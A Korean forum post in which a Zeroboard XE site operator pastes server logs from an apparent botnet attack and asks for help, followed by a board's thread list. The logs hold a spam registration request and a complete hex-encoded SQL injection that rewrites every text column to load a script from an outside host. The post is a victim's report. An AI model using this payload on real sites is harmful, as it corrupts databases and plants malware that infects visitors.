묻고답하기

제로보드 xe 사용자입니다.

어제 밤에 늦게부터 갑자기 이상한 접속이 계속 들어오기 시작했습니다. 로그 내용을 보니 정상적인 접속이 아니라는 것은 분명하더군요.

대충 이렇습니다.

GET /zbxe/?mid=board_free&document_srl=3704965&page=&accept_agreement=&user_id=eEiZBaSXzuyTyCIF&password1=&password2=&user_name=Msadxfcz&nick_name=Msadxfcz&email_address=ermihgsg%40jpoblxse.com&homepage=http%3A%2F%2Fcodeine.cogiage.com%2Famben-plus-codeine-drug-interaction.html&blog=PMvJBaFlMBKqyPxgUIh&birthday=&allow_mailing=Y&open_sf=&sf=mfMiZrMJVQiCeUvpo&open_nateon=&nateon=vlQKdWLjkwHosAExZK&open_hobby=&hobby=GrcjrNrsUNmQedxkl&open_msn=&msn=ermihgsg%40jpoblxse.com HTTP/1.1" 200 80517

GET /zbxe/?document_srl=3391884';dEcLaRe%20@S%20VaRcHaR(4000)%20SeT%20@s=cAsT(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F732E6361776A622E636F6D2F732E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20aS%20VaRcHaR(4000));eXeC(@s);

분명히 정상적인 것은 아니고 아마도 '공격'이 아닐까 생각되는군요.


그런데 문제는 IP가 하나가 아니라는 것입니다. 그야말로 전세계... 대충 체크해본 IP 주소만 50개쯤은 되는데다 IP주소가 하나같이 일관성이 없습니다. (지역도 여기저기 무작위라고 할까요?)


일단 IP 차단이나 점검을 위하여 vhost 설정을 바꾸어 공사중 폴더(_contruction)만 나오도록 했더니 아예 이렇게 바뀌는군요.

GET /zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/?mid=club_trpg&document_srl=3403073&sort_index=voted_count&order_type=desc

GET /zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/files/attach/images/3617148/3617460/nostalghia_poster.jpg HTTP/1.1" 302 574

이를보면 봇이나 cgi로 보이는데 서버 운영에 대한 경험이 부족해서 해결 방법을 도저히 찾을 수가 없습니다.


그리하여 바로 지금 이 순간에도 무수한 접속이 들어오면서 로그를 무진장 늘려나가고 있습니다. 접속 차단 정도로는 의미가 없고....

어떻게 이런 상황이 생길 수 있는 것인지 도저히 알 수가 없군요.

제로보드의 내용을 분석해서 (이를테면 ?mid = 이라고 지정하지 해가면서) 부하를 늘려나가고 있는데, 혹시라도 이와 같은 문제를 겪으신 분이 계시는지요?

어찌할바를 모르기에 혹시라도 조언을 구할 수 있을까 문의해 봅니다.

참고로, 제로보드의 버젼은 1.1.1 입니다.
글쓴이 제목 최종 글
XE 공지 글 쓰기,삭제 운영방식 변경 공지 [16] 2019.03.05 by 남기남
김병화999 XE 새버전에서 자동 출처 표시 애드온 기능이 안되네요? [3] 2008.12.05 by 김병화999
山水菊 [해결] 1.1.1 업데이트 후 버튼이... [3] file 2008.12.05 by 山水菊
왜만지냐 .htaccess 파일 수정하는방법좀 알려주세요 (서브도메인관련) [3] 2008.12.05 by 느까끼
야따 플래시 쪼금 다루실줄 아는분 꼭 봐주세요 ㅠㅅ ㅠ. [1] 2008.12.05 by 느까끼
천원 메뉴 글씨체는 어떻게 수정하나요? [2] 2008.12.05 by 천원
nugude 게시판에서 글쓸때 파일첨부가 안되요. 왜그러죠??? 도움부탁해요. [9] 2008.12.05 by 정우현
초얼 환율서비스 글자 깨짐 현상 [1] 2008.12.05 by 백성찬
큐브넷 페이지 수정 & 저장  
Jiyoung540 게시판이 새로운 레이아웃을 설정하고는 이상합니다 [2] 2008.12.05 by Jiyoung
서혁준498 게시판 정렬 방식 설정 했을경우 문제점..  
raystorm 관리페이지와, 페이지설정 화면에 오류가 생기네요.. [3] file 2008.12.05 by raystorm
goongkem <탭방식 최근게시물> 개수 제한 어떻게 할까요?_다시 봐주세요 [3] file 2008.12.05 by MikeMin
박종록 메인화면 페이지 수정사항을 버젼 업그레이드시 이어받을수 있나요? [2] 2008.12.05 by 느까끼
억샌풀 게시판 글이 깨지는 이유 좀 알려주세용... [1] 2008.12.05 by 느까끼
서혁준498 게시판 생성후 게시판을 열어 보면 안열립니다.. [2] 2008.12.05 by 서혁준498
이니영혼 이미지첨부후 본문삽입후 등록시 사이트 전체를 먹통시키는 문제. [11] 2008.12.05 by 이니영혼
인도 홈페이지패키지내에 자동으로 생성된 홈페이지를 삭제하는 방법이 없나요? [3] 2008.12.05 by 느까끼
박노열 홈페이지가 자주 멈추는 것은 왜일가요?  
Cocoa-Mind 웹진형 위젯 사용할 때 줄바꿈 처리.. [3] 2008.12.05 by 아케보노
쌀콩 이미 존재하는 모듈이름 오류 아시는분... [1] 2008.12.05 by 느까끼
샤릉해 [포토샵, 드림위버 질문] 이미지맵과 레이어 show hide [1] 2008.12.05 by 샤릉해
문양호 아래 그림처럼 메뉴를 만들려고하는데 조언 부탁드려요 [2] file 2008.12.05 by 문양호
김영근 제로보드4 와 XE 를 같은 계정에 설치해서 사용할수 있나요?? [2] 2008.12.05 by 냉무닷컴
큰바위 1.1.1 패치 후 로그인이 안됩니다. [2] file 2008.12.05 by 큰바위
박종록 버젼 갈아탈때요...과정/방법 급질문... [4] 2008.12.05 by 박종록
아쮸구리 고수님들 꼭 봐주세요 ㅠㅠ(스크린샷게시판및 쪽지)  
아쮸구리 게시판에 레벨 아이콘이 안뜨네요 ㅠㅠ [1] 2020.03.14 by 아쮸구리
복고열전 컴퓨터 잘하시는 형님들 도와주세요..조회수 올리는방법. [2] 2008.12.05 by ◀CGlink▶
~도기 공격을 받는 것 같습니다.  
로엘로니 글제목의 폰트를 바꾸고싶은데요 ''''ㅂ;; [1] 2008.12.05 by 센세이션